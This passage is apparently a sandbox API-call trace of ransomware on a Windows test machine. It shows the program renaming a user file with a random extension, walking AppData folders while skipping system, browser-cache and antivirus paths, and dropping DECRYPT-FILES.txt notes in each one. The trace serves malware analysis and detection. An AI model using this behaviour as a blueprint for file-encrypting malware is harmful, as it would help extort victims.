(in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.289] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.289] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.289] lstrlenA (lpString="DELETEATOM") returned 10 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.289] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.289] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.289] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.289] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.289] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.289] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.289] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.289] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.289] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.289] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.289] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.289] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.289] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.290] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.290] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.290] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.290] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.290] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.290] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.290] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.290] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.290] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.290] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.290] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.290] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.290] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.290] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.290] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.290] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.290] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.290] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.290] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.291] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.291] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.291] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.291] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.291] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.291] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.291] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.291] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.291] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav") returned 55 [0077.291] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav.NGeQd3o") returned 63 [0077.291] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lxiva.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav.NGeQd3o" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lxiva.wav.ngeqd3o"), dwFlags=0x0) returned 1 [0077.292] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.292] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.292] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.293] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0077.293] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0077.293] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0077.293] lstrcatW (in: lpString1="Macromedia", lpString2="\\" | out: lpString1="Macromedia\\") returned="Macromedia\\" [0077.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Macromedia\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Program Files") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch=":\\Windows") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Games\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\All Users") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="AhnLab") returned 0x0 [0077.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0077.293] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.293] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\jkbimi8.tmp") returned 69 [0077.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0077.294] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0077.294] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.294] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\DECRYPT-FILES.txt") returned 75 [0077.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0077.295] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0077.296] CloseHandle (hObject=0x444) returned 1 [0077.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0077.296] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*" [0077.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa458780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0077.296] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.296] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa458780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.297] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa458780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.297] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.297] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0077.297] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0077.297] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0077.297] lstrcatW (in: lpString1="Flash Player", lpString2="\\" | out: lpString1="Flash Player\\") returned="Flash Player\\" [0077.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Program Files") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch=":\\Windows") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Games\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\All Users") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="AhnLab") returned 0x0 [0077.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.297] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0077.297] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.297] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\jkbimi8.tmp") returned 82 [0077.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0077.298] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.298] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\DECRYPT-FILES.txt") returned 88 [0077.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.299] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.300] CloseHandle (hObject=0x44c) returned 1 [0077.300] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0077.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0077.301] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.301] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.301] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="#SharedObjects", cAlternateFileName="#SHARE~1")) returned 1 [0077.301] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0077.301] lstrcmpW (lpString1="#SharedObjects", 